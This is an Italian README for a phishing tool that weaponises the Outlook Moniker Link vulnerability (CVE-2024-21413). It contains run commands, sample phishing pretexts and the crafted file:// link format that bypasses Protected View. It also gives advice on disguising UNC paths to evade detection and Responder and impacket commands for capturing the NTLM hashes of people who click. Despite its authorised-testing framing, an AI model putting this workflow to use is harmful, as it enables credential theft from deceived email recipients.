
Uno strumento di ricerca di sicurezza per simulare campagne di phishing mirate utilizzando CVE-2024-21413 (Moniker Link).
Uno strumento di ricerca per la sicurezza progettato per simulare campagne di phishing mirate utilizzando la vulnerabilità CVE-2024-21413 Moniker Link. Pensato per operazioni di red team autorizzate, penetration testing e formazione sulla consapevolezza della sicurezza.
BLIND TRUST è un framework per campagne di phishing che aiuta i team di sicurezza a comprendere e testare le proprie difese contro attacchi email sofisticati. Sfrutta la tecnica Moniker Link per bypassare la Protected View di Outlook, fornendo una simulazione realistica che le organizzazioni possono utilizzare per rafforzare la propria postura di sicurezza.
Questo strumento automatizza il flusso di lavoro end-to-end di una campagna, dalla configurazione all'invio delle email, mantenendo la sicurezza operativa attraverso percorsi UNC personalizzabili e opzioni di pretesto flessibili.
Le organizzazioni devono comprendere le tecniche di attacco reali per difendersi efficacemente. TRUST consente:
.txt in stile wordlist# Clona il repository
git clone https://github.com/h1ssbl1tz/Blind-Trust.git
cd TRUST
# Esegui lo strumento
python3 TRUST_v7.py
Lo strumento utilizza solo moduli della libreria standard Python:
getpass - Input sicuro della password
html - Escapamento HTML
ipaddress - Validazione indirizzi IP
logging - Logging strutturato
os - Operazioni su file
re - Espressioni regolari
signal - Gestione segnali
smtplib - Protocollo email SMTP
sys - Utilità di sistema
time - Operazioni temporali
dataclasses - Modellazione della configurazione
email - Costruzione email MIME
typing - Suggerimenti di tipo
Nessun pacchetto esterno richiesto: funziona ovunque con Python 3.7+.
python3 TRUST_v7.py
Segui la procedura guidata interattiva attraverso 5 passaggi:
Caricare i target da [f]ile o [i]nput direttamente?: i
Indirizzo/i email target: [email protected], [email protected]
Oggetto email [Security Update Required]: Urgente: Avviso Scadenza Password
Nome visualizzato (campo Da) [Microsoft Security Center]: Team IT Sicurezza
Corpo email: La tua password scade tra 24 ore. Aggiornala immediatamente.
Host UNC (IP o dominio) [192.168.1.100]: it-internal.company.com
Nome condivisione UNC [updates]: patches
Nome exploit UNC [patch]: kb_security_2024
Crea targets.txt:
# Dipartimento Finanze
[email protected]
[email protected]
[email protected]
# Contabilità
[email protected]
[email protected]
Poi esegui:
Caricare i target da [f]ile o [i]nput direttamente?: f
Percorso del file target: targets.txt
[+] Caricati 5 target da targets.txt
Oggetto email: Revisione Finanziaria Q3 - Azione Richiesta
Nome visualizzato: Team Operazioni Finanziarie
Corpo email: Si prega di rivedere il bilancio finanziario Q3 allegato e fornire approvazione.
Host UNC: finance-internal.company.com
Condivisione UNC: quarterly
Exploit UNC: q3_financial_report
Percorso UNC generato: file://finance-internal.company.com/quarterly!q3_financial_report
Due opzioni:
.txt con un'email per riga, commenti che iniziano con #È qui che si evitano firme ovvie:
finance-internal.company.com) invece di un semplice IPquarterly, updates, documentsq3_report, security_patch, training_documentRisultato: Invece dell'ovvio \\192.168.1.100\share!exploit, ottieni qualcosa come file://finance-internal.company.com/quarterly!q3_report.
Inizio
↓
[PASSO 1] Richiedi email attaccante e password SMTP
↓
[PASSO 2] Richiedi IP listener SMB
↓
[PASSO 3] Carica email target (file o input)
↓
↓→ Per ogni target:
│ - Valida formato email
│ - Controlla duplicati
│
[PASSO 4] Richiedi pretesto email
│ - Oggetto, nome Da, corpo testo
│
[PASSO 5] Richiedi personalizzazione percorso UNC
│ - Host, condivisione, nome exploit
│
↓
[COSTRUISCI] Costruisci oggetto di configurazione
↓
[VALIDAZIONE] Controlla che tutti i campi siano presenti e validi
↓
[RIEPILOGO] Mostra riepilogo pre-invio per revisione
↓
[CONFERMA] L'utente approva o annulla
↓
[INVIA] Per ogni target:
│ - Costruisci email MIME con Moniker Link personalizzato
│ - Tenta consegna SMTP con logica di ripetizione
│ - Registra successo/fallimento per target
│
↓
[REPORT] Mostra risultati della campagna (consegnati vs falliti)
↓
Esci
CVE-2024-21413 (Moniker Link) è una vulnerabilità di Outlook che permette di incorporare URL file:// con il carattere !. Quando un utente clicca su tale link, Outlook tenta di accedere al percorso UNC, innescando un tentativo di autenticazione NTLM anche in modalità Protected View.
\\host\condivisione!exploit! bypassa la Protected ViewTRUST automatizza la fase di consegna:
Soluzione: Verifica le credenziali SMTP. Per Gmail, usa una password specifica per l'app. Per la posta aziendale, contatta l'amministratore SMTP.
Soluzione: Normale per alcuni server SMTP. La connessione proseguirà senza crittografia TLS.
Soluzione: Assicurati che le email nei file wordlist siano complete e in formato valido ([email protected]).
Soluzione: L'indirizzo email non esiste sul server di destinazione, oppure il server sta bloccando il relay dal tuo account.
Soluzione: Verifica che il percorso del file sia corretto e che il file esista nella directory corrente.
D: Questo strumento è legale da usare? R: Solo con autorizzazione scritta esplicita dell'organizzazione che stai testando. Il phishing non autorizzato è illegale. Avere sempre un perimetro di lavoro e regole di ingaggio per iscritto.
D: Può bypassare i filtri email avanzati? R: È una simulazione realistica, ma la sicurezza email moderna potrebbe ancora rilevarlo. Questo è il punto: se i filtri della tua organizzazione falliscono contro questo, hai un problema da risolvere.
D: Perché personalizzare il percorso UNC?
R: Il \\IP\condivisione!exploit originale è un chiaro segnale. Gli attaccanti reali usano percorsi realistici. Il tuo team di sicurezza dovrebbe identificare sia gli indicatori ovvi che quelli sottili.
D: Posso usarlo per formare i dipendenti? R: Sì. Dopo test autorizzati, usa esempi di campagne anonimizzati nella formazione sulla consapevolezza della sicurezza per mostrare ai dipendenti tecniche di attacco reali.
D: Questo strumento cattura le credenziali? R: No. TRUST consegna solo l'email. Hai bisogno di un listener SMB separato (Responder, impacket-smbserver, ecc.) per catturare gli hash NTLM quando i target cliccano sul link.
D: Come configuro un listener SMB? R: Usa Responder su Linux o impacket-smbserver:
# Responder (cattura hash)
sudo responder -i eth0 -v
# impacket-smbserver (simulazione file server)
impacket-smbserver Share /tmp -smb2support
Questo strumento è esclusivamente per test di sicurezza autorizzati.
Usando TRUST, riconosci di comprendere le implicazioni legali e di possedere la dovuta autorizzazione.
Questo progetto è rilasciato sotto licenza MIT con l'aggiunta di una restrizione d'uso. Vedi LICENSE per i dettagli.
Questo progetto si basa e si ispira alla ricerca originale su CVE-2024-21413 e all'implementazione di CMNatic (https://github.com/cmnatic).
A CMNatic vanno tutti i meriti per:
Questo repository rappresenta una versione modificata ed estesa di quel lavoro, con miglioramenti tra cui:
Vedi CREDITS.md per attribuzioni più dettagliate.
H1SS - Versione estesa e mantenuta per scopi di ricerca sulla sicurezza e test autorizzati.
I contributi sono benvenuti. Assicurati che eventuali modifiche:
Vedi CONTRIBUTING.md per le linee guida.
Per problemi, domande o suggerimenti, apri una segnalazione su GitHub.
Ricorda: Questo strumento è un progetto di ricerca. Usalo in modo responsabile, legale ed etico.